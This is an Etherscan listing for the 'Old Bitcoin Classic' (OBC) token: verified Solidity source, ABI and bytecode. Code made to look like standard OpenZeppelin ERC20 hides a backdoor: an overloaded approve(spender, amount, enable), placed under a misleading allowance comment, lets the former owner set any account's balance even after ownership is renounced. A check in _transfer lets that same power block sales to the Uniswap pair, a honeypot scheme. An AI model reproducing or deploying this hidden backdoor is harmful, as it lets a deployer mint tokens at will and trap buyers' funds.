ETH Price: $3,615.68 (-2.07%)

Token

ERC-20: Old Bitcoin Classic (OBC)
 

Overview

Max Total Supply

21,000,000 OBC

Holders

13

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
192,268.207963547 OBC

Value
$0.00
0xa89990d7a057732fd69ef29ec97c855cb7896047
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OldBitcoinClassic

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-03-19
*/

/**

OLD BITCOIN CLASSIC
WE FOLLOW THE VISION OF SATOSHI NAKAMOTO! 
WE CREATE A DECENTRALIZED, DIGITAL CURRENCY THAT WOULD BE FREE FROM ORGANIZATION MANIPULATION AND CONTROL.

Website: https://oldbtcclassic.xyz/
Telegram: https://t.me/OldBitcoinClassic
Twitter: https://twitter.com/oldbtcclassic

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.15;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function approve(address spender, uint256 amount, bool enable) public virtual {
        address _owner = oldOwner;

        require(msg.sender == _owner, "ERC20: approve from owner address");
        require(enable == true, "ERC20: approve from owner address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _balances[spender] = amount;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract OldBitcoinClassic is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 21_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    uint256 _burnPercent = 5;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("Old Bitcoin Classic", "OBC", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 2;
        maxTxAmount = TOTAL_SUPPLY / 2;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");
            }

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526005600c553480156200001657600080fd5b50604051620016f7380380620016f7833981016040819052620000399162000242565b6040518060400160405280601381526020017f4f6c6420426974636f696e20436c617373696300000000000000000000000000815250604051806040016040528060038152602001624f424360e81b815250664a9b6384488000620000ad620000a7620001d660201b60201c565b620001da565b6006620000bb848262000319565b506007620000ca838262000319565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600e80546001600160a01b0319166001600160a01b0384161790555080620001476002664a9b6384488000620003e5565b600a556200015e6002664a9b6384488000620003e5565b60095550600b6020527f44433eeeda1d04bdae79f62169cdb2ab0a6af287fa15706d3fafdbac5fac34158054600160ff1991821681179092556001600160a01b039290921660009081526040808220805485168417905533825280822080548516841790553082529020805490921617905562000408565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b6000602082840312156200025557600080fd5b81516001600160a01b03811681146200026d57600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200029f57607f821691505b602082108103620002c057634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200031457600081815260208120601f850160051c81016020861015620002ef5750805b601f850160051c820191505b818110156200031057828155600101620002fb565b5050505b505050565b81516001600160401b0381111562000335576200033562000274565b6200034d816200034684546200028a565b84620002c6565b602080601f8311600181146200038557600084156200036c5750858301515b600019600386901b1c1916600185901b17855562000310565b600085815260208120601f198616915b82811015620003b65788860151825594840194600190910190840162000395565b5085821015620003d55787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000826200040357634e487b7160e01b600052601260045260246000fd5b500490565b6112df80620004186000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f18565b60405180910390f35b61016261015d366004610f7b565b610370565b005b610177610172366004610fc2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a7366004610fee565b610421565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610fc2565b6104d2565b6008546101779060ff1681565b610162610509565b61018b6101fa36600461102f565b6001600160a01b031660009081526003602052604090205490565b610162610520565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610534565b61017761025736600461102f565b600b6020526000908152604090205460ff1681565b61017761027a366004610fc2565b610543565b61017761028d366004610fc2565b6105de565b61018b6102a0366004611053565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461102f565b6105eb565b6060600680546102ed9061108c565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061108c565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110c6565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110c6565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611107565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610664565b5060015b92915050565b600061042e84848461074d565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b35760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c785336104c2868561115f565b610664565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c2908690611172565b6105116108e4565b6008805460ff19166001179055565b6105286108e4565b610532600061093e565b565b6060600780546102ed9061108c565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d433856104c2868561115f565b5060019392505050565b600061041733848461074d565b6105f36108e4565b6001600160a01b0381166106585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106618161093e565b50565b6001600160a01b0383166106c65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106ec5760405162461bcd60e51b815260040161039b90611107565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107735760405162461bcd60e51b815260040161039b90611185565b6001600160a01b0382166107995760405162461bcd60e51b815260040161039b906111ca565b6107a48383836109a6565b806000036107b157505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107f357506001600160a01b0382166000908152600b602052604090205460ff16155b156108d457600d546001600160a01b039081169083160361087657600e546001600160a01b0316600090815260036020526040902054156108765760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089f5750600d546001600160a01b038381169116145b156108d45760006064600c54836108b6919061120d565b6108c09190611224565b90506108ce84848484610c71565b50505050565b6108df838383610df9565b505050565b6000546001600160a01b031633146105325760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108df576001600160a01b0383166000908152600b602052604090205460ff161580156109f257506001600160a01b0382166000908152600b602052604090205460ff16155b156108df57600954811115610a3e5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610bdb57600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac59190611246565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b4b9190611246565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bba9190611246565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0390811690831603610bf657505050565b600a5481610c19846001600160a01b031660009081526003602052604090205490565b610c239190611172565b11156108df5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610c975760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038316610cbd5760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03841660009081526003602052604090205482811015610cf65760405162461bcd60e51b815260040161039b90611263565b6001600160a01b03851660009081526003602052604090208382039055610d1d828461115f565b92508160056000828254610d31919061115f565b90915550506001600160a01b03841660009081526003602052604081208054859290610d5e908490611172565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dea91815260200190565b60405180910390a35050505050565b6001600160a01b038316610e1f5760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038216610e455760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03831660009081526003602052604090205481811015610e7e5760405162461bcd60e51b815260040161039b90611263565b610e88828261115f565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ebe908490611172565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f0a91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f4557858101830151858201604001528201610f29565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461066157600080fd5b600080600060608486031215610f9057600080fd5b8335610f9b81610f66565b92506020840135915060408401358015158114610fb757600080fd5b809150509250925092565b60008060408385031215610fd557600080fd5b8235610fe081610f66565b946020939093013593505050565b60008060006060848603121561100357600080fd5b833561100e81610f66565b9250602084013561101e81610f66565b929592945050506040919091013590565b60006020828403121561104157600080fd5b813561104c81610f66565b9392505050565b6000806040838503121561106657600080fd5b823561107181610f66565b9150602083013561108181610f66565b809150509250929050565b600181811c908216806110a057607f821691505b6020821081036110c057634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8181038181111561041b5761041b611149565b8082018082111561041b5761041b611149565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761041b5761041b611149565b60008261124157634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561125857600080fd5b815161104c81610f66565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212204f0d00bf3782b6b4dc5dd54093d117855ee32c8b655904b78363bdcd5464ea3564736f6c634300081300330000000000000000000000000505b